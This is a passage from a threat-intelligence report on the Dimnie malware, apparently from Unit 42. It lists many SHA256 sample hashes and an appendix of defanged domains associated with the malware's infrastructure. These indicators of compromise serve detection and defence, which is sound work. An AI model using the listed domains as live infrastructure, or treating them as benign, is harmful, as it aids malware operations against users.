er.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 15 of 40\n\n6069b42bfdf59ce5ec95f068e871ee266fa7593457eb4b38dda113014be87ce6\r\nd3f4e3459bbe753ea8c022eef425d5b098b0f32c0e4cc4f390442d9796ed4ee2\r\n9dd9befeefdc13ae72bf90952892eb357bdff72083c282fb73dd3821afe43e72\r\neb1f746dbdc2598757423e4505ff898b8308282e638f9b940d84870e7a196fba\r\n32b7a4f26eb3e2f44eeb82b95f9971572aeb82f1e218bbad39b2a8238d1448bd\r\ne3e708a03186f373d002e6e84c649bbd95668c2c17dee9c7fb0143f3d675837c\r\nb909e6e7f909abbb57af26b244b330f822ed552a3c4dadd028079d8070108c10\r\n813fdde0b998bda3247eadab873677972681274b4a9905030bf8d76727d57a6c\r\n0353e9168983735e8efd2d53b4c498b7810f49e67169e33eb42ed2ef8d3a13eb\r\n49b2fae0ae4d9cf71c2766a0d965d8a50bacd8c522eb45656b8b5f6a1c7c8f51\r\n54e54c459dbe3224d3f4947b30f20b365224552afac4bd45ddadfacee9a7cbe2\r\n6b8b394add913d3c410787f0c711217fec60a917872465de04290a8003b73535\r\n3977472c733eafb7e71f8fd6fece5d2cfc849ec88e9d6942082531f3f88818b2\r\nb2faf0d9f8f436968f3851ae863f3b3d9190b1be5856f2bd044e6b04447efa2f\r\n53e4330ba988627e5f1f5544f23fae1c66c0f2d714a922b1130a1c9dc2efeda5\r\n2c5871fb46e6fbf95266830ba7b4923449d0bc99a4efd7586ff5556ca049ea1c\r\n20b2c347268546d317711aa693d078c0dcac247e486e3b87e45b099fabdff607\r\nc8dee4c2212c7bf8eb9cd7635ff42526b17340fb198a801cdaa8d4ef72a3c1db\r\nc3511e8d5de1ab2146ddb8ecc735890ef5cec0b31d175fca2fb2b88d60ec3e43\r\n947e55e3454031972cc3d11006a60091b2197cc9e241e562ed900b82e4f28bd9\r\nba03da023f13796dd6dd70db0234da5df33ddc18ba274cdc62c282d56c695ece\r\nde3aa81710f2580d3ac690c1f6d087a4672f29ccaa36e3901e4904056f83a48d\r\nb3f371cc899440583095bac2817fba2ae2c7c3cac9c121d0798e03730589ad33\r\ndaefdf3c053971d35eb4a7447cf74c0335066d557ddbe56f01611e8b9a38b512\r\n0dac129154c01867ca391da20227fdf7d7e3a9dd4cf42eac76833a051153794f\r\ndd3ada0bb17356592e13bae5961c0bb131e645d2c957f1f2047cc25528f60518\r\nf94b5803298a18b6ddc5eab202db6ae4e7199adf298ce16698e8053a36d5f934\r\n6e7cb2c05000d0e609cebdb7d598fffc48eb5e7d1d589fc0947e322cdcffa070\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 16 of 40\n\ndfc6ff1c54d3b7c2d6aa3ab9573debfe83b2d9a82c20b765a852c77d792ab10e\r\na0af21826f06da5292dfea3574648137292e31df1cd70a8262f03354dabfb38b\r\n788222fe51e7bc91ce229f67557843db34e1ad68296069ed3235b022407fa610\r\n858dc8648024588c644466e0386e101a925295f4b8ba3e3b7235aab7eee2788c\r\n25eb81fc61b60b1a01eafc040b292b8c206a883555d1db3b80103f6a09b92f7d\r\na0ee38e7edac534827a1501bcc535ab7f604abfe654eb34b330ececc544cb084\r\nc870b4dffa82f8b60efaf7b98875e4f823a207dfb2f0023ca1700392ca91c5c0\r\ncb677ce864730abb68cb007f5ce3cf067fa982d5ec5e79402f4dd28506f763c7\r\n29c653c91fa209754ffdc7d5d450df1eacea065eb327943d613a5341d4d091b7\r\n0919a323113724b2e8734a3178996cedee88f827f7706423acf8407568a93bce\r\n4aceb41286ad09a78a31006e65c374fd82f3f0682592cfa1b06a390b4450404a\r\n8a1d7fe6146ad99ee806586f217e067cd34d5bff7dd44d516e08576c22b1a382\r\n6905b72571b27eb36191c5394fdb8aa91a25561e2f65bb7f6283cd67b8b42695\r\ncd0fcb23fe5387245008d5aba8e9f937bae13da0f5319e4c0952a0e5f8715fca\r\n927d28f4be7b208111298aede19ea6a33d69769081747504a2a6fc0e65596582\r\n0f7810dddc7f204c7da31f6d599ddf7b671dc635aa1c415dd3f5a65ffa0d72e9\r\n665079b17747eb20e80e97a8d8b432fd3760cbe72edba4bac5f3dc95e2576d57\r\nd24c97b62ed06288d3887dd9b720da4900e8703360fe48d62899e6ee156eda20\r\n1d130eee41544ea7389f90a1cc19d2535ab5236985912c3cc000e5a9d2416e81\r\n485c8b3339b13cd8cbb52c03b1024665f9307490a107c0bd8205cebf76cdcd3b\r\nfffef40864cecb56422bb793055749084ab1d756a35075d60cd547b2a7b074cd\r\n444dfc3bbb7406135002e3b6a75e48cd4ac40bb3213f9ba4836ad202e5fcea4a\r\nd13c9c157d9ef56620698b20e2ffca8d9dcac3dd3109382098f423ca9588031f\r\n0f710fb601b78993e28808184c8e868a474dcb679d61bd80e01f215eecf22f83\r\n4a9c473209596f2abb19c0a15b638458ef2c27a208053ec6f89b7b5e8efc882f\r\nb36087991947633cfb1d758065323daf9e2179f668a31e6f639d85f946bef3cd\r\n93ce0b122022fbd855b22e88b6598f705a319154cc3b6693f0a55fee8382fdbf\r\ndc0bbbd2d6b7d37886059415d6cdcb4ac93b55ae06162670407b6aa0eaf44b63\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 17 of 40\n\nebfb311bf63b625ddf60d925669cf6b52a8980636a7b1536341cc78ac494eeb4\r\nc7b07e16f61c792b8ccf5de098b0b291957b83184786b578bf87dcf3aba06d1e\r\n550b73295af24954fba98ad5a86b2fb977d57e951c3b7f5deb10189bbb26a6fc\r\n42c5651efc6ff62f6315f315f25c0407e773e702f43cca806ffb4c8ff899f524\r\n69d69ef813c95e73881b8c0c567652f4c4c208d25ba778760f8becf79ac924e3\r\na1f766bbb2beae7a1211003e3b3e63f006ed28a1b7fb2e1549af1ffa2f0f477b\r\n45c3824018e889e8fb006a83386a1e459b563cf9db1546f49c4bbc5faa9ea74e\r\ne911e6e631d26b2f93779868d4b20224b2bfde798f2d42cb9870d951f4f10c53\r\nf66536dff13b1ba415bd4c5fc172632465d33cc388899e976a49380da5620e45\r\nf1af98d63fec8e0164aa6bac58c680c80075545aabdbdc49ef9cb45694d14642\r\ne701fa1b68a80e77863e06de17a19a2f489aefe8af8b47bc0d908c726eb41053\r\n03307e8bbbdceaa8393cdd13fd854d2705b5bfdf211b40a53113b915debbfc02\r\nb5a785aa5284b96f08e9b191b3c1259d13e478523504486a24191b6e239b74e2\r\n7c324b8b01db025d627df826283af003f54d2d5f20d6d52bee380a69a1fcd9d4\r\n08cc9d83ae7f9805058555a43ec0f0daa73346feb38c2c244b3a4311f623d3b7\r\ne73b2fdd33a250705dd044761a1890afe5ba0b1553b2c7ae5dbedd45e58c0a0a\r\ne3d368a3e613f27cfd17db2ed439b6980f9bf0d10458d25066e316e4193c5d18\r\nbfdad4010fb8104881c0392ff3d60e43e9eee73a7f8d00ab2097898dcfc14710\r\n35f636b1876b17b923486924ebe629a98465b480f6635c9db09a16814a5eada3\r\n320183fca03a973f746adba3e5bdac62be152bc4d32c6cf466383cd951ec2560\r\n206c8c6f0bf5792631387b823cb4c1682041805b5c3241cd6d700c6e5475066b\r\nb33e64b53c8f4af8e8cc75feb2de709da7614082ffd19f7a2110eb1b8b8ab546\r\n31f6399b3423324eea084964bd979689bb367021b424e264f32c3787bfce85e7\r\n4a1dcecd71ff7323eb3d0b1bcfc4d61b859e7734fcaa33b01bc3b727557b4d52\r\nc2b5a2df6b792edac0d491a643cb525012f959934ba7a1846e14e51c810d8d42\r\nff5c86f1287d1b8ffc5822792ac00255176d706859749b7f2d4baef49f1f833a\r\ndfa8a776451866e2773d57f79a839b2baddbf50792794993bdcefd0631c3f9b3\r\n2977ecd28f44130c0afec70578b1c4fe240e39ad201d2ddd7fe1d9c2bd1330a2\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 18 of 40\n\n5e0612a0124b15e193f630346800aee5307477110a5d4f8df23fc41d1d451387\r\nb39ffb21bcba526d3ee503bcfdd18aee2a2bdec4b0798c6648fd3f25f3d78bb5\r\nb86f42f252d586d032ee0e4022585c457f98f667bbe9f2f4ba4d53e6f34537fa\r\nb30f53594e7e4b21a54c4011d67b2075185ca1b53084078b624341a8ab906702\r\n7e83122da3f7152a5a03deca48dd600315b1c8c285c9e5922e7d691d6afe0f4f\r\n271431e7eb1c89b52ffb154912925dcf9fc4210fa91a2b4c27f27037f1bc9e02\r\nf98ac9b51c9395ed3d28dbfae6116b2f753dfec679223c6a4f9dac948a0e95a8\r\ncc60033583227cda159007add0b3274f5752195bdae47495ee49d299b0a39ff4\r\n0299289e2146e4655a8ba43191243dafab24023dafa857eaf82ed3ef423013a8\r\n63f1f839dbac88b1ad4022e152379d3d909f30eaf34d08b3c459f16845082c94\r\nb7bf2ad207ac67e422bc69ec0058fb21a8f52061b564e1ef565887eaf3dd1dca\r\nd9c2be7b02dcf65889d764ba4ebf9908672c2a234cb4291d89826ff749909623\r\nca752bfec0b9f14a36c69e0c90edcc846f67923ae81ef5c5719480aecbbedff9\r\nd23d4055c99b7bd3581a83443d934c95d2ec8dd9c690ba29b611e64587add39f\r\ndd4d9ff987aaa9f2bdf526207a97d7182ef3be37fa08591a40e9bdcb8937c2d4\r\ne3feff7f25d06c8e01d62d76a5f6272fa92f41ae05e0fbff51b67b9cc55cf452\r\n00b3dcdeed117b8eaefff05246114c2ca49e88b3ccbac073c5cd87318e215f37\r\n34084bc57ca269c05ef65720bc39d8bd284000316242721982f4538af351852a\r\ndf4e6982fe1977a49e37239b2d28a60b39317eb8dcb3e383c74b70fa62007b47\r\n221302051095909ea47eac8ac8b9bcc82c51bab6946aca7c8822aee732fbee30\r\n0205f46daf74ac9a66ac89dad04b805528656e482f452e616e9f260f1ec6f710\r\n09cef29d19f76796b6effae5d6e193efc98c9e1e9e6523566ec995a78daf3dfc\r\nef704e0118c5935e0afd4632d10c1ef1e69ae026e73fcdc9d9b272db50a8aeba\r\n126636a1fb2e955970051505d834d3d3571105cb82b28393c05222332e29e9c1\r\nf9583642689abf8b472ebd1f67b7ef9b7728837452ac476e68c3f06d62447c6d\r\n5050de5d74798d634d7639ef9638da8f9be63158bbcf2bbfb50038a7ee1e53ed\r\n70871cb6d07a406f6b1748e5614e1ec33b879b159484a9f82354025a801cd1c3\r\n26a93a22a3080545ab09ee93a7385cc0a85d9a75df8d0d88310d8bc639530714\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 19 of 40\n\nabd5cf43abd878e8d7633e19bc309de840ec4e12624cabd99ac6152d9455d44f\r\nb84328459e911de77827392db7967bb9ebefe90e365a8369ab8716a6b50aa5a2\r\ndfdb3b363d82d552b8b1a1de116f6e68c2a055170a5c83f43575ad3ae9b90ddb\r\ne5ef4e95831f24f345b4c00834b88b19098cada540da6aa60ba7ca861d20fd95\r\n8e04108c5e164c1f077f0abeac10fdf295207e1f160350d999527ce23f078385\r\n385b7126e4f3634ea1dda80d8bb4790e1b1a904d6232e51d0888ffd744b97dbf\r\n3b12c8915af0cea47a7126b4a7f1ae788972dfac366d5573ef2681ff3d13ad41\r\n05bb5e77bb934779bc7b6fff863bdc4f4db9759bf939c3cfff3ab0f75fcd13e7\r\ne7ee85ec5a7c228be03b201502a1e74186f36c7611917bacd9fc67501df3606c\r\n9f7e640951097f84b7ab42514ec2eae951b3c1b817c68efa9daae4345d2695b2\r\n88e075627d93bbf43eabd699ca9afac0cceaf43f18f8c7ac43f2a7f93a247b55\r\n06b8fa74196fa7edccb77a4bde000928a8ec15d56c5dd3c4af7237f876fc0991\r\nc6db6e329d73616e6869bbb4f86fbdcab88c948176253df82729a2010493b09a\r\n93867701be29f7154cf9f4bc72faad9e9859f4db3ed3030c04fcf03bab085b10\r\n7f4fc4475cf86628ac5277c363fbe0bf47e87e726e4247eabe788e4440bf5bff\r\nfd348ee3cc11647a87a7a065cc8dcc63cacad3349da567ce6cb5eb3f7d0a6ad1\r\nfb6aa05b6c9a6d394d33f2a6cdd4a9c626eaf784990b69aab15e6ebc51908739\r\n90aa424f52bd1f227ace86348c707ecc711c808526805915c50dfebf4bc49186\r\nb131f561551cfe16804cffa4ed1651576ddb9e880913d245c23c7756311e474c\r\n1d9ea027c8494e88148aa1b2d87bd13cf753902445423ac63257b89ccff1dd9e\r\n88aafb45bb4e7d68b5476b4673fd38f49c233d42475f7460afae37610004b54a\r\n40c4c891231a3932b5c15b42e1ff302f6fdf4776aab25a67f827333621795d9a\r\n3191b3988616e9e834c883348ab635727d3d1b7e964226ee9488c1e7a482ce3f\r\nf33d5ebb15bf924e590a2bea2c4cb914f1398b5694c2958b0c97c548327403ff\r\n3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22\r\n76c566798ffcede356a8ba95a56c0400d41c746ad1a0f8503b66c9ae3a9e28da\r\n09e39c3598fc68bd8193e47bad89723a8a989fc439cd717bc6cbdc596b144305\r\n6d97956e23d15262be7af32eceff949ee708904cf5dce9cb6f6d732c37fe0692\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 20 of 40\n\n5994178fd21ef4fbcea34a27890e24d56e5ebd247d26b4219f4d5475e4e00a9c\r\nb2484daed920e8065605675822eb3b0e66d947f024dbc8193f39988a6e37afd9\r\n4f7a58f1809fd0685ec815d0f5c910d39ef27ed2c4576339b3477a44aa756bad\r\n86debb3398b60748c2c1d0d88694c7308f2017c6737490e84fe688396a0c5aa4\r\nf2693ac1f73aa32dc4682ca66918e3ed78ed490cabc942018a6eca8c4aed9630\r\n810e765fc4b9f838ed619a777528b243573d79e93ab29d8e1e3071ea2619fe0f\r\n18241e18bdb290aa026d87c6d3dfa780d76347e8e966f3956bdfe44f36325473\r\nc88771c9a6adc3c8bd6bd2d173c82f0e1c1a5966cbb2f05c5471b978840c2223\r\n5f2e9aa038862b16ab09e6960262a25993e715df786a339bea352411e5e8ab12\r\nf0b5592de97e7e7193b76e073ee21b090884f503c85258ab0cc1d780ae4e41c4\r\nf22ed39d51c61cae0e03b2be39e05d1bfef05e55320aace141332a4a8ed3bd2c\r\nde77795f1344857af0b583e38939f1cbf789b0989b6c8dca4e8ea3a6f0e646a1\r\n60c2d4a1a5f757f5c9d3686bf85a5529e040049723ca3988e1f9560ea93a386d\r\n3c0f463ac70d2f2415fbdb0446ba0fad290fd93b3db9708ffc4a4bdca0b5d4f7\r\n9bb12887255696617d3e6356fe9f343473f6805db7dfabc6585a2ecd3289bff7\r\n2829d72b813345348681d402184d53ec74fa491a0f3c726aae6c39b901fac1e9\r\nd95990b7b03d017a64b8aa9f6133416176902d4195af9917660088245f4ebe7a\r\ne267f9233c885d662804197e153e69cb2f7704f14b5d082dce7fe3c2d581d4df\r\n6886aa1e2760b874a4950cac08e76259ff476a1976a0aeca4d392f60eefca6cc\r\n1773b425ac6c670cabfdfa300c0b0c2724bd0585b87218c3119af39c170d3074\r\n12558c50b9b61d080aac7b0890f1b95142316ae0d4e78dfb98672571543ecf6e\r\n05789b1487fa274943d967834ad530bc89d94aeed8c240f96d9922f05d6fb101\r\na797aff0ed250f1fffbc6a718796b63907a94ac21d6bb712a5e7786670a9d1fe\r\nf842607898e226fb480979112b0d67e3266ed7abf55f854851db0686ef5e4987\r\n5584a83d69a01b2a3402c21f78284f6de8ac0a7e5dd5b25b6b9b59eb95f4eeaf\r\n86c2d111086dba6c114ed114b1392183c2be4283b1702d5970601d7a29201178\r\n1583319eb9266680c0cdc81937c76242306f365b767abe4f85322bace65f9d3c\r\n949ad75ea9292d2d85498dc3a9ee033d736e40deba1a19a44419d91cee218a58\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 21 of 40\n\n9011510e459b324b98b45284fba36d92c3dcafb2c9dc7a8a29256b3439a1c526\r\nde6134aec7b39d8f90dcaf1da03ad50ecbc8b48a6e62b6a67d0cec68e9968267\r\nc373ad48e60fb8a396a80927546e9898760422447981238d91679e6ee8a09d6d\r\n2663d24e63d15e6f247039f7d0fb51958eddb5ad7043a2d305e24f8db6477271\r\n8ff4c76bc1bf9a10b17fdcfdd300b89df94be848ecb0af81f6aefba38ec5bfae\r\n102602fd35bd0d00d28f4dfb1bc4eb2a207e4d8cb9f4311ac7b1133f9e43da26\r\n5f860598d21cceeb7d67142b3a75f94cdee5a4bd7ab8718a35b04264154097e3\r\nf3e45f9e4dbd773b64cfe164de9e42f250f996b58b619fc2f0773be7965d235d\r\n6369d5d194bcc1db2ba8d85c3d15b031a1c2f12463a4259e7cd4686c598e436b\r\nad91716f7148e6f1ecb70184139e32dcf8f5e521cd3f039f5a44d39d9c3ce09b\r\na8ba70be73578d901c5e2427fd2f63e06801dcba8726a82f1875d84ba147aaa3\r\n7647a422655510e1de02e3d43b176d5c26d1d621680db9a58c047c9bdb615402\r\n3b9b73d3b6e3337974e2bb2d1d49227fe5611354ebf294df56a514a8abfb413a\r\n1a32705bffda8774bf600c81d77a517e809ba9efd93a4fa8608ae9ee78968e3c\r\n413d664b5a7c3e6dbb1f39a971e09aee66e509846604f99ecfdb2be744ab8056\r\n780129565290dfbc00f9bd85c6c0c2a74c980d2baa3ce7f60c102441155d4b07\r\nbfff5e3879908b721c1c9c78cb8162dde2c557c7d8b2e191d75e702c437a4662\r\n3f6a79d68262bbd4401fb9e889ab93d863cde5f095f6bbf3da286f06e41fb39d\r\n215e742c07a0675d309855caf0a5b0560ef679e12b9f15c8ab2a22706bd6353a\r\n1123b618043e9578eb6a50a5ee41bae55c23126448a100cdcfdae255a4f7d408\r\n69c22ca5a0814c285769a05f93235161b24360d02cf24c9527a0eef8becc3886\r\n103e8aa2363344bdbda105d471a6086d2fd4ca87bd71509c0704a096c13da70c\r\n78d88775a781cb31e00dba41d7bb1f67a0928b2dc1b4ab6a0d26f038f894f175\r\nec341985ced6f2a6001e8b17491682cb69fefc417a90ae2773bc2de4fd6b705c\r\nd2b523a861ecaa02e3ea0ea542087a09ea640ed36bc2c9cba311e91c7b01ecd0\r\n66cbe12b2b6e8869bc5399f96aa73ebc949de0530030f358cca48077aae0b294\r\nd9ee7be833f760311805e92c7b9c448d2c609f258997038383cb337d8183fe71\r\n14ff515a168fb6649f58c4a9d86531b151187df3bfdd1589cbc9804d3a1ec7c9\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 22 of 40\n\n023f81fd3a34ef94c9fd6928304426929672d4c7e9c98e60b631cbd2e2a56731\r\ncbb7c2fedc753f62fa1bf47f2e0c6aa487eecfd27d867789764dbde97a8b9449\r\n93369c703becbc0bb9960fb55b7d61ae733638e1e6eab10336faf8ce877925f6\r\nf3a1fb80a5c79d3735ddc4328b915a4b034526ae96345c9b2465c16582ab54be\r\n3e30805f1de04950d50d08176c8ac3c2974b42b30913c9aa11693d1a0e34b98a\r\n3cada2c960ec431d0f13edcbee4dcfef1dcbdce0538b511f110cbee2e6470722\r\ncec7a9270993443ed9cd798a3ac64693195805a410f56468518fa48cf5923876\r\n9003bfa0553e0e027105f822d08a82050854ecf6488db4d3c412d6996b1bf632\r\n5e139ca25b1519cc28a8096cb28d2be69f57b1af037674a81902f9c605777543\r\nf40f1dda30d5f959bc21b0049432c53bb06992c7c8fdd5e886a9b3a0fab06877\r\nb2a2d63c68fce4d4bfddd4fd8584b6c638ee26664785df436c48ffa16e177893\r\nfa91599afa18eff9735b0c0328c8cb0fc305f8d924ebb36a609e50e4a6ab256c\r\n0a31bfdc22ff3cea5a160b2c32a98764027be7512ced50825d1be0b93a7e7aa4\r\n6bd3c86cb1f04d08407fccda35b0dd2fc8bd83a3c10f913dded93b4bbba182c9\r\n0909f8383cd77107234b5c1aa1c80a1f1bc2e8a2832284ff3de6636d5ed16b8a\r\n9dde31f29d5180b26eb93dfe2fc07bae76f929b8d3add20fc577033ae234b437\r\n28e888ec5247511d01df376f4be7e08c64841df37d9846580e87145c8efbbd10\r\n5693592ed69ca1cf0a5f8dcf8f548c063da287ce3e164a89df720a39a290feea\r\n1b6651a523be1c42f779877ad11f3b52130686aad4fd4ecdfbc15afbcea56aa2\r\n6d99f010c237fec5ff022cdf2f0df8b26429c1d5f223ca4f1658fc833c9cef3e\r\n46089e4e9aebf5fd5ad1ffaecb3bee5d7490f2cc53b5ed66b7509282ca29438b\r\n998481fbb26e890b83e1738ee12281103ca77775a20c1c6f1705eb6552237e3b\r\n4b373c2d50e600fdae5259bbd3e989d002a776c443869b92afeb5d53b73bd1c0\r\n1f376d4c4febcafa6bdcf8877121c20697046c15f71983a9210762fbf3b5455e\r\n0321f7948476480ab1875ccdeac46c37a58c2f60d63d2a787bdcf292ff2a5685\r\n3bb134617af6f7b0f0c483b315f7ea45b2ed2c4a91005b453c9ec9e86ef0d70b\r\ndad5e918c4ce849f682485bd79e097ac097b554daa897b12151b4595d67980aa\r\n7b801c415f2fb9210c4d89e7d6332c1a812defe78b234d658b60f9337b8f4266\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 23 of 40\n\n75285821f9997b304058e8bf76c7c3f9f4abcf47e0dffea73d6256f657b9e778\r\n210024ece45a6935da89ab7c5ae3293616679414e96e2157e49f9f607c831bdc\r\n97bbfb81f930d138ff47c3b899eee6917802385b8c8c1626a7679c5cab41c4a2\r\ncbc9e5552cda22130cd7a84cd4b3c68e95eb3f8c2e83dd77253bd1822d1f840d\r\nbf00cd1bc34ce457b0e4a99a8df5b7fda512496dc32f2762923254bc85261afb\r\n9de260dcfe2f5a852c0cff238ffc3fe3fc93feff008463af49f68c9f5b5ebc9b\r\ncadb1646563a317ac72579e8691c464bab439667811fb0d850bc2e950a3a332c\r\ndd3d708ba8ce177fd1f756ac5eb3347a0ec7cf65706438ea5bbdfe9125b0dbe4\r\n31df6ec1089e720c09e29f35ce33203359128c99cc0e4b03ec3e38237e8151ff\r\ne349394a043e11410ed3e7c35c70d85dbb9c5e512b593e51e1acde3b404414a2\r\ndddb5843c775ae47b37fd02c378699b4e250ac32739f30e0949bdaa28050a595\r\n42da6fd7f6ba8b90ffd1298d068045c7928cef6506642e69859e0b962b5864a8\r\ne6624eb4520d41516f64aa64a00ee224c8bf257403a12a9665d552348dad1bd5\r\n79ca3b8afac2ca896d7db2110789a187ad75810e2d92aa6f0378f73c1f72006f\r\nad08a0e1dace8d5a443a4bd21ec8d935e267f364ae1b152edaccb0b1f82870d7\r\nb87ada7c17cdb5b7c3cf1e6a0d35515c62112126f2f983c1190a6d9d1060b7db\r\n2ec204d0f35404c2548ac3dbc7b02e5db7ba28d4bc5c701986f0bfcee2a5fa5a\r\n77e1dfaeb73c4edf762f9503c428c1d92af6882b48305f5f5b070ec136575e43\r\n610d37dfb3089b516e4bced89de0c5161614d50ca511853f7be81138dfc4e844\r\n60ff74d053037b5ae70eeaf199a0acba35f58d275d12915ae8ed813dbf9a5b55\r\n376943f886b264824f6063e7dfc54a1a2d5071a3d44dec05208596079d6cf276\r\n89d4d851e6729a854fccb4d4f9277f9f545396714ff2b108d29c7ff418a501a3\r\n18db52a63720187b2afd57667e9ebdcb0a50a8e99909340281dcd07e266d761f\r\nbb05a0d905b915e2e84a8e69c2af438f72730131c5a1e3e1fe85df13c61182ac\r\n187155b727346d63c1b1c8e4e3ae88aed89746a4a323b5170139fa5aa760b3a3\r\n7451c813eebe45ee8c743abc5e75c9475cab427d44e9a255f89f73c4e7ca7106\r\n44cd0fdb877838f559d60500cd08cee66d8a79005d7e86f81671c18ec7ab3cb5\r\n810aed604e1ec5d5aec00c783bc44e5ca753c5c0f2dc64f431c8f8d48b6dbf41\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 24 of 40\n\nAppendix B: Associated Domains\r\n1c-host[.]host\r\n1cpred[.]org\r\nallforest[.]pw\r\nantiprt[.]com\r\natonix[.]pw\r\nbabbabbab[.]ru\r\nbabbabbab2[.]ru\r\nbabbebbab[.]com\r\nbabbebbab2[.]com\r\nbabbibbab2[.]ua\r\nbabbihbab[.]host\r\nbabblabbab2[.]link\r\nbabblahbab[.]com\r\nbabblebbab[.]pw\r\nbabblebbab2[.]pw\r\nbabblehbab[.]top\r\nbabblibbab2[.]xyz\r\nbabblihbab[.]link\r\nbabblohbab[.]pw\r\nbabblulbab[.]pw\r\nbabbobbab[.]link\r\nbabbohbab[.]com\r\nbabbolbab[.]host\r\nbabbolbab[.]ru\r\nbabbrabbab2[.]xyz\r\nbabbrebbab[.]rocks\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 25 of 40\n\nbabbrebbab2[.]rocks\r\nbabbrehbab[.]pw\r\nbabbribbab2[.]space\r\nbabbrihbab[.]xyz\r\nbabbrohbab[.]rocks\r\nbabbrulbab[.]rocks\r\nbabbulbab[.]com\r\nbabchabbab[.]org\r\nbabchabbab2[.]org\r\nbabchebbab2[.]ru\r\nbabchehbab[.]in\r\nbabchibbab[.]com\r\nbabchihbab[.]org\r\nbabcholbab[.]org\r\nbabclabbab2[.]space\r\nbabclebbab[.]biz\r\nbabclebbab2[.]biz\r\nbabclehbab[.]rocks\r\nbabclibbab2[.]in\r\nbabclihbab[.]space\r\nbabclohbab[.]biz\r\nbabclulbab[.]biz\r\nbabcrabbab2[.]in\r\nbabcrambab[.]ru\r\nbabcrebbab[.]org\r\nbabcrebbab2[.]org\r\nbabcrehbab[.]biz\r\nbabcribbab[.]ru\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 26 of 40\n\nbabcrihbab[.]in\r\nbabcrohbab[.]org\r\nbabcruhbab[.]host\r\nbabcrulbab[.]org\r\nbabdabbab[.]ua\r\nbabdabbab2[.]ua\r\nbabdebbab[.]link\r\nbabdebbab2[.]link\r\nbabdibbab2[.]pw\r\nbabdihbab[.]top\r\nbabdobbab[.]xyz\r\nbabdohbab[.]link\r\nbabdolbab[.]top\r\nbabdrabbab2[.]ru\r\nbabdrambab[.]ua\r\nbabdrebbab[.]com\r\nbabdrebbab2[.]com\r\nbabdrehbab[.]org\r\nbabdribbab[.]ua\r\nbabdrihbab[.]host\r\nbabdrohbab[.]com\r\nbabdruhbab[.]top\r\nbabdrulbab[.]com\r\nbabdulbab[.]link\r\nbabfabbab[.]pw\r\nbabfabbab2[.]pw\r\nbabfebbab[.]top\r\nbabfebbab[.]xyz\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 27 of 40\n\nbabfebbab2[.]xyz\r\nbabfibbab2[.]rocks\r\nbabfihbab[.]pw\r\nbabflabbab2[.]ua\r\nbabflambab[.]pw\r\nbabflebbab[.]link\r\nbabflebbab2[.]link\r\nbabflehbab[.]com\r\nbabflibbab[.]pw\r\nbabflihbab[.]top\r\nbabflohbab[.]link\r\nbabfluhbab[.]pw\r\nbabflulbab[.]link\r\nbabfobbab[.]space\r\nbabfohbab[.]xyz\r\nbabfolbab[.]pw\r\nbabfrabbab2[.]pw\r\nbabfrebbab[.]xyz\r\nbabfrebbab2[.]xyz\r\nbabfrehbab[.]link\r\nbabfribbab[.]rocks\r\nbabfrihbab[.]pw\r\nbabfrohbab[.]xyz\r\nbabfrulbab[.]xyz\r\nbabfulbab[.]xyz\r\nbabgabbab2[.]rocks\r\nbabgebbab[.]space\r\nbabgebbab2[.]space\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 28 of 40\n\nbabgibbab2[.]biz\r\nbabgihbab[.]rocks\r\nbabglabbab2[.]rocks\r\nbabglebbab[.]space\r\nbabglebbab2[.]space\r\nbabglehbab[.]xyz\r\nbabglibbab[.]biz\r\nbabglihbab[.]rocks\r\nbabglohbab[.]space\r\nbabglulbab[.]space\r\nbabgobbab[.]in\r\nbabgofbab[.]biz\r\nbabgohbab[.]space\r\nbabgrabbab2[.]biz\r\nbabgrebbab[.]in\r\nbabgrebbab2[.]in\r\nbabgrehbab[.]space\r\nbabgribbab[.]org\r\nbabgrihbab[.]biz\r\nbabgrohbab[.]in\r\nbabgrulbab[.]in\r\nbabgulbab[.]space\r\nbabhabbab2[.]biz\r\nbabhebbab[.]in\r\nbabhebbab2[.]in\r\nbabhibbab2[.]org\r\nbabhihbab[.]biz\r\nbabhohbab[.]in\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 29 of 40\n\nbabhulbab[.]in\r\nbabjabbab2[.]org\r\nbabjebbab[.]ru\r\nbabjebbab2[.]ru\r\nbabjibbab2[.]com\r\nbabjihbab[.]org\r\nbabjohbab[.]host\r\nbabjulbab[.]host\r\nbabkabbab2[.]com\r\nbabkebbab[.]ua\r\nbabkebbab2[.]ua\r\nbabkehbab[.]host\r\nbabkibbab2[.]link\r\nbabkihbab[.]com\r\nbabkohbab[.]top\r\nbabkulbab[.]top\r\nbablabbab2[.]link\r\nbablebbab[.]pw\r\nbablebbab2[.]pw\r\nbablehbab[.]top\r\nbablibbab2[.]xyz\r\nbablihbab[.]link\r\nbablohbab[.]pw\r\nbablulbab[.]pw\r\nbabmabbab[.]xyz\r\nbabmabbab2[.]xyz\r\nbabmebbab[.]rocks\r\nbabmebbab2[.]rocks\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 30 of 